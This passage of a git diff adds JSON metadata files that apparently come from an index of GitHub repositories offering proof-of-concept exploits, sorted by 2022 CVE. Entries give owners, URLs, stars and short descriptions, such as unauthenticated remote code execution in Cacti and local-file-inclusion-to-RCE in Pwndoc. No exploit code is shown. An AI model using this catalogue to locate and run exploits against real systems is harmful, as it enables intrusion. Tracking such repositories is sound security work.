Protocol). The script automates the process of authorization, payload generation, and execution, allowing for remote command execution on the target device.", + "fork": false, + "created_at": "2024-08-09T19:30:20Z", + "updated_at": "2024-10-06T16:41:27Z", + "pushed_at": "2024-08-09T19:31:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "arris", + "arris-modem", + "arris-router", + "buffer-overflow", + "cve", + "cve-2022-45701", + "cybersecurity", + "ethical-hacking", + "exploit", + "exploit-development", + "linux", + "penetration-testing", + "poc", + "python", + "security", + "snmp", + "vulnerability", + "vulnerability-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45728.json b/2022/CVE-2022-45728.json new file mode 100644 index 0000000000..637edc1f6d --- /dev/null +++ b/2022/CVE-2022-45728.json @@ -0,0 +1,33 @@ +[ + { + "id": 585251034, + "name": "CVE-2022-45728", + "full_name": "sudoninja-noob\/CVE-2022-45728", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-45728", + "description": null, + "fork": false, + "created_at": "2023-01-04T17:41:57Z", + "updated_at": "2023-01-04T17:41:57Z", + "pushed_at": "2023-01-04T17:43:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45729.json b/2022/CVE-2022-45729.json new file mode 100644 index 0000000000..86fe93fe02 --- /dev/null +++ b/2022/CVE-2022-45729.json @@ -0,0 +1,33 @@ +[ + { + "id": 585253557, + "name": "CVE-2022-45729", + "full_name": "sudoninja-noob\/CVE-2022-45729", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-45729", + "description": null, + "fork": false, + "created_at": "2023-01-04T17:50:00Z", + "updated_at": "2023-01-04T17:50:00Z", + "pushed_at": "2023-01-04T17:50:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45770.json b/2022/CVE-2022-45770.json new file mode 100644 index 0000000000..e60231df22 --- /dev/null +++ b/2022/CVE-2022-45770.json @@ -0,0 +1,33 @@ +[ + { + "id": 591626374, + "name": "CVE-2022-45770", + "full_name": "Marsel-marsel\/CVE-2022-45770", + "owner": { + "login": "Marsel-marsel", + "id": 19998507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19998507?v=4", + "html_url": "https:\/\/github.com\/Marsel-marsel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Marsel-marsel\/CVE-2022-45770", + "description": "LPE exploit via windows driver", + "fork": false, + "created_at": "2023-01-21T10:32:02Z", + "updated_at": "2023-09-02T18:57:44Z", + "pushed_at": "2023-04-25T07:54:36Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45771.json b/2022/CVE-2022-45771.json new file mode 100644 index 0000000000..20712eca91 --- /dev/null +++ b/2022/CVE-2022-45771.json @@ -0,0 +1,75 @@ +[ + { + "id": 577691389, + "name": "CVE-2022-45771-Pwndoc-LFI-to-RCE", + "full_name": "p0dalirius\/CVE-2022-45771-Pwndoc-LFI-to-RCE", + "owner": { + "login": "p0dalirius", + "id": 79218792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4", + "html_url": "https:\/\/github.com\/p0dalirius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2022-45771-Pwndoc-LFI-to-RCE", + "description": "Pwndoc local file inclusion to remote code execution of Node.js code on the server", + "fork": false, + "created_at": "2022-12-13T10:03:14Z", + "updated_at": "2024-08-12T20:28:51Z", + "pushed_at": "2023-09-14T20:19:41Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-45771", + "exploit", + "pwndoc", + "rce" + ], + "visibility": "public", + "forks": 9, + "watchers": 46, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 600465186, + "name": "CVE-2022-45771", + "full_name": "yuriisanin\/CVE-2022-45771", + "owner": { + "login": "yuriisanin", + "id": 11749007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11749007?v=4", + "html_url": "https:\/\/github.com\/yuriisanin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuriisanin\/CVE-2022-45771", + "description": "[PoC] Privilege escalation & code execution via LFI in PwnDoC ", + "fork": false, + "created_at": "2023-02-11T15:26:14Z", + "updated_at": "2024-11-22T18:47:15Z", + "pushed_at": "2023-02-11T15:30:56Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "privesc", + "privilege-escalation", + "pwndoc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45808.json b/2022/CVE-2022-45808.json new file mode 100644 index 0000000000..cf533ec1eb --- /dev/null +++ b/2022/CVE-2022-45808.json @@ -0,0 +1,33 @@ +[ + { + "id": 680205273, + "name": "CVE-2022-45808", + "full_name": "RandomRobbieBF\/CVE-2022-45808", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-45808", + "description": "LearnPress Plugin < 4.2.0 - Unauthenticated SQLi", + "fork": false, + "created_at": "2023-08-18T15:43:50Z", + "updated_at": "2024-08-12T20:32:31Z", + "pushed_at": "2023-08-18T15:45:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45934.json b/2022/CVE-2022-45934.json new file mode 100644 index 0000000000..99783cf2fd --- /dev/null +++ b/2022/CVE-2022-45934.json @@ -0,0 +1,95 @@ +[ + { + "id": 591176120, + "name": "linux-4.19.72_CVE-2022-45934", + "full_name": "Trinadh465\/linux-4.19.72_CVE-2022-45934", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.19.72_CVE-2022-45934", + "description": null, + "fork": false, + "created_at": "2023-01-20T05:00:05Z", + "updated_at": "2023-03-10T01:13:39Z", + "pushed_at": "2023-01-20T05:09:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 591256259, + "name": "linux-4.1.15_CVE-2022-45934", + "full_name": "Trinadh465\/linux-4.1.15_CVE-2022-45934", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2022-45934", + "description": null, + "fork": false, + "created_at": "2023-01-20T10:03:07Z", + "updated_at": "2023-03-10T01:20:04Z", + "pushed_at": "2023-01-20T10:08:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618323077, + "name": "linux-4.1.15_CVE-2022-45934", + "full_name": "Satheesh575555\/linux-4.1.15_CVE-2022-45934", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.1.15_CVE-2022-45934", + "description": null, + "fork": false, + "created_at": "2023-03-24T08:16:44Z", + "updated_at": "2023-03-24T08:21:50Z", + "pushed_at": "2023-03-24T08:19:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-45988.json b/2022/CVE-2022-45988.json new file mode 100644 index 0000000000..ceaa0f52ea --- /dev/null +++ b/2022/CVE-2022-45988.json @@ -0,0 +1,33 @@ +[ + { + "id": 569575443, + "name": "CVE-2022-45988", + "full_name": "happy0717\/CVE-2022-45988", + "owner": { + "login": "happy0717", + "id": 36958703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36958703?v=4", + "html_url": "https:\/\/github.com\/happy0717", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/happy0717\/CVE-2022-45988", + "description": "CVE-2022-45988 StarSoftComm HP CooCare An elevation of privilege vulnerability exists", + "fork": false, + "created_at": "2022-11-23T06:17:02Z", + "updated_at": "2023-03-03T09:21:53Z", + "pushed_at": "2023-03-04T09:59:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46080.json b/2022/CVE-2022-46080.json new file mode 100644 index 0000000000..f8a1b7a107 --- /dev/null +++ b/2022/CVE-2022-46080.json @@ -0,0 +1,84 @@ +[ + { + "id": 662043677, + "name": "CVE-2022-46080", + "full_name": "yerodin\/CVE-2022-46080", + "owner": { + "login": "yerodin", + "id": 9205071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9205071?v=4", + "html_url": "https:\/\/github.com\/yerodin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yerodin\/CVE-2022-46080", + "description": "Nexxt Router 15.03.06.60 Authentication Bypass and Remote Command Execution", + "fork": false, + "created_at": "2023-07-04T08:31:04Z", + "updated_at": "2023-11-08T19:15:20Z", + "pushed_at": "2023-07-04T08:31:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840471119, + "name": "CVE-2022-46080", + "full_name": "geniuszlyy\/CVE-2022-46080", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2022-46080", + "description": "it is script that enables Telnet on routers by sending a specially crafted request. The script allows users to specify the router's URL, Telnet port, and password. It validates the inputs and logs the process, providing feedback on whether the exploit was successful.", + "fork": false, + "created_at": "2024-08-09T19:32:32Z", + "updated_at": "2024-11-20T16:31:00Z", + "pushed_at": "2024-08-11T07:29:30Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2022-46080", + "cybersecurity", + "ethical-hacking", + "exploit", + "exploit-development", + "linux", + "nexxt", + "nexxt-router", + "penetration-testing", + "poc", + "rce", + "rce-exploit", + "router", + "security", + "telnet", + "vulnerability", + "vulnerability-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46087.json b/2022/CVE-2022-46087.json new file mode 100644 index 0000000000..3e69c84029 --- /dev/null +++ b/2022/CVE-2022-46087.json @@ -0,0 +1,33 @@ +[ + { + "id": 616850712, + "name": "CVE-2022-46087", + "full_name": "G37SYS73M\/CVE-2022-46087", + "owner": { + "login": "G37SYS73M", + "id": 77768845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77768845?v=4", + "html_url": "https:\/\/github.com\/G37SYS73M", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G37SYS73M\/CVE-2022-46087", + "description": "CloudSchool v3.0.1 is vulnerable to Cross Site Scripting (XSS). A normal user can steal session cookies of the admin users through notification received by the admin user.", + "fork": false, + "created_at": "2023-03-21T08:02:48Z", + "updated_at": "2023-03-21T08:02:48Z", + "pushed_at": "2023-03-21T08:03:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46104.json b/2022/CVE-2022-46104.json new file mode 100644 index 0000000000..950ae68af5 --- /dev/null +++ b/2022/CVE-2022-46104.json @@ -0,0 +1,33 @@ +[ + { + "id": 590562074, + "name": "CVE-2022-46104---POC", + "full_name": "NurSec747\/CVE-2022-46104---POC", + "owner": { + "login": "NurSec747", + "id": 123009127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123009127?v=4", + "html_url": "https:\/\/github.com\/NurSec747", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NurSec747\/CVE-2022-46104---POC", + "description": null, + "fork": false, + "created_at": "2023-01-18T17:41:06Z", + "updated_at": "2023-01-18T17:41:06Z", + "pushed_at": "2023-01-18T17:51:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4611.json b/2022/CVE-2022-4611.json new file mode 100644 index 0000000000..e2ce388bb2 --- /dev/null +++ b/2022/CVE-2022-4611.json @@ -0,0 +1,64 @@ +[ + { + "id": 663142991, + "name": "CVE-2022-4611", + "full_name": "Phamchie\/CVE-2022-4611", + "owner": { + "login": "Phamchie", + "id": 97181079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97181079?v=4", + "html_url": "https:\/\/github.com\/Phamchie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Phamchie\/CVE-2022-4611", + "description": null, + "fork": false, + "created_at": "2023-07-06T16:40:08Z", + "updated_at": "2023-08-05T15:42:03Z", + "pushed_at": "2023-07-06T16:50:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 663236213, + "name": "CVE-2022-4611", + "full_name": "fgsoftware1\/CVE-2022-4611", + "owner": { + "login": "fgsoftware1", + "id": 60277618, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60277618?v=4", + "html_url": "https:\/\/github.com\/fgsoftware1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fgsoftware1\/CVE-2022-4611", + "description": null, + "fork": false, + "created_at": "2023-07-06T21:28:29Z", + "updated_at": "2023-07-06T21:31:15Z", + "pushed_at": "2023-07-06T21:31:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4616.json b/2022/CVE-2022-4616.json new file mode 100644 index 0000000000..5de2e56bbe --- /dev/null +++ b/2022/CVE-2022-4616.json @@ -0,0 +1,33 @@ +[ + { + "id": 639674200, + "name": "CVE-2022-4616-POC", + "full_name": "ahanel13\/CVE-2022-4616-POC", + "owner": { + "login": "ahanel13", + "id": 47185077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47185077?v=4", + "html_url": "https:\/\/github.com\/ahanel13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahanel13\/CVE-2022-4616-POC", + "description": "This Python script aids in exploiting CVE-2022-46169 by automating payload delivery and response handling. It starts an HTTP server, listens for requests, and enables command input for real-time interaction with a vulnerable target.", + "fork": false, + "created_at": "2023-05-12T01:20:15Z", + "updated_at": "2023-05-24T22:36:05Z", + "pushed_at": "2023-05-24T22:36:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46164.json b/2022/CVE-2022-46164.json new file mode 100644 index 0000000000..06191001d1 --- /dev/null +++ b/2022/CVE-2022-46164.json @@ -0,0 +1,33 @@ +[ + { + "id": 585004232, + "name": "CVE-2022-46164-poc", + "full_name": "stephenbradshaw\/CVE-2022-46164-poc", + "owner": { + "login": "stephenbradshaw", + "id": 7692557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7692557?v=4", + "html_url": "https:\/\/github.com\/stephenbradshaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stephenbradshaw\/CVE-2022-46164-poc", + "description": "Basic POC exploit for CVE-2022-46164", + "fork": false, + "created_at": "2023-01-04T04:17:30Z", + "updated_at": "2023-09-08T08:19:32Z", + "pushed_at": "2023-01-11T07:16:34Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46166.json b/2022/CVE-2022-46166.json new file mode 100644 index 0000000000..bdf39cc9f0 --- /dev/null +++ b/2022/CVE-2022-46166.json @@ -0,0 +1,33 @@ +[ + { + "id": 599959676, + "name": "CVE-2022-46166", + "full_name": "DickDock\/CVE-2022-46166", + "owner": { + "login": "DickDock", + "id": 45897719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45897719?v=4", + "html_url": "https:\/\/github.com\/DickDock", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DickDock\/CVE-2022-46166", + "description": "CVE-2022-46166 靶场环境", + "fork": false, + "created_at": "2023-02-10T09:06:34Z", + "updated_at": "2023-11-14T16:13:35Z", + "pushed_at": "2023-02-10T09:15:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46169.json b/2022/CVE-2022-46169.json new file mode 100644 index 0000000000..96dcebb879 --- /dev/null +++ b/2022/CVE-2022-46169.json @@ -0,0 +1,1041 @@ +[ + { + "id": 575289853, + "name": "CVE-2022-46169", + "full_name": "imjdl\/CVE-2022-46169", + "owner": { + "login": "imjdl", + "id": 31382943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31382943?v=4", + "html_url": "https:\/\/github.com\/imjdl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imjdl\/CVE-2022-46169", + "description": "CVE-2022-46169", + "fork": false, + "created_at": "2022-12-07T07:11:23Z", + "updated_at": "2023-03-28T06:17:46Z", + "pushed_at": "2022-12-07T07:17:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 575651169, + "name": "CVE-2022-46169", + "full_name": "0xf4n9x\/CVE-2022-46169", + "owner": { + "login": "0xf4n9x", + "id": 40891670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40891670?v=4", + "html_url": "https:\/\/github.com\/0xf4n9x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xf4n9x\/CVE-2022-46169", + "description": "CVE-2022-46169 Cacti remote_agent.php Unauthenticated Command Injection.", + "fork": false, + "created_at": "2022-12-08T01:52:13Z", + "updated_at": "2024-10-30T03:43:51Z", + "pushed_at": "2022-12-08T02:50:46Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 49, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 579086902, + "name": "CVE-2022-46169", + "full_name": "taythebot\/CVE-2022-46169", + "owner": { + "login": "taythebot", + "id": 60461479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60461479?v=4", + "html_url": "https:\/\/github.com\/taythebot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/taythebot\/CVE-2022-46169", + "description": "CVE-2022-46169 - Cacti Blind Remote Code Execution (Pre-Auth)", + "fork": false, + "created_at": "2022-12-16T16:16:35Z", + "updated_at": "2023-01-05T21:32:10Z", + "pushed_at": "2022-12-16T16:53:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 584490516, + "name": "CVE-2022-46169", + "full_name": "Inplex-sys\/CVE-2022-46169", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-46169", + "description": "Cacti Unauthenticated Command Injection", + "fork": false, + "created_at": "2023-01-02T18:03:26Z", + "updated_at": "2023-03-11T00:41:32Z", + "pushed_at": "2023-01-02T18:05:45Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti", + "cve", + "hgrab-framework", + "poc", + "rce", + "scanner", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 585629170, + "name": "CVE-2022-46169", + "full_name": "sAsPeCt488\/CVE-2022-46169", + "owner": { + "login": "sAsPeCt488", + "id": 55363474, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55363474?v=4", + "html_url": "https:\/\/github.com\/sAsPeCt488", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sAsPeCt488\/CVE-2022-46169", + "description": "PoC for CVE-2022-46169 - Unauthenticated RCE on Cacti <= 1.2.22", + "fork": false, + "created_at": "2023-01-05T16:56:06Z", + "updated_at": "2024-11-07T21:22:24Z", + "pushed_at": "2023-05-05T18:06:58Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti", + "cve-2022-46169", + "poc" + ], + "visibility": "public", + "forks": 8, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 588437634, + "name": "CVE-2022-46169", + "full_name": "c3rrberu5\/CVE-2022-46169", + "owner": { + "login": "c3rrberu5", + "id": 109983457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109983457?v=4", + "html_url": "https:\/\/github.com\/c3rrberu5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c3rrberu5\/CVE-2022-46169", + "description": "Exploit to CVE-2022-46169 vulnerability", + "fork": false, + "created_at": "2023-01-13T05:37:56Z", + "updated_at": "2024-06-06T21:53:35Z", + "pushed_at": "2023-01-16T23:14:04Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589360535, + "name": "CVE-2022-46169", + "full_name": "Habib0x0\/CVE-2022-46169", + "owner": { + "login": "Habib0x0", + "id": 24976957, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24976957?v=4", + "html_url": "https:\/\/github.com\/Habib0x0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Habib0x0\/CVE-2022-46169", + "description": "Cacti: Unauthenticated Remote Code Execution Exploit in Ruby ", + "fork": false, + "created_at": "2023-01-15T22:46:52Z", + "updated_at": "2023-02-13T09:30:29Z", + "pushed_at": "2023-01-20T07:10:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589524043, + "name": "CVE-2022-46169_POC", + "full_name": "N1arut\/CVE-2022-46169_POC", + "owner": { + "login": "N1arut", + "id": 41994914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41994914?v=4", + "html_url": "https:\/\/github.com\/N1arut", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/N1arut\/CVE-2022-46169_POC", + "description": "RCE POC for CVE-2022-46169", + "fork": false, + "created_at": "2023-01-16T10:21:26Z", + "updated_at": "2023-10-08T20:21:44Z", + "pushed_at": "2023-01-17T16:32:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 596690527, + "name": "CVE-2022-46169", + "full_name": "miko550\/CVE-2022-46169", + "owner": { + "login": "miko550", + "id": 83682793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83682793?v=4", + "html_url": "https:\/\/github.com\/miko550", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miko550\/CVE-2022-46169", + "description": null, + "fork": false, + "created_at": "2023-02-02T18:21:08Z", + "updated_at": "2023-02-02T18:25:02Z", + "pushed_at": "2023-02-02T18:42:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 612724556, + "name": "cacti-cve-2022-46169-exploit", + "full_name": "ariyaadinatha\/cacti-cve-2022-46169-exploit", + "owner": { + "login": "ariyaadinatha", + "id": 54601298, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54601298?v=4", + "html_url": "https:\/\/github.com\/ariyaadinatha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ariyaadinatha\/cacti-cve-2022-46169-exploit", + "description": "This is poc of CVE-2022-46169 authentication bypass and remote code execution", + "fork": false, + "created_at": "2023-03-11T19:39:44Z", + "updated_at": "2023-11-22T00:03:33Z", + "pushed_at": "2023-05-18T19:06:36Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 616701865, + "name": 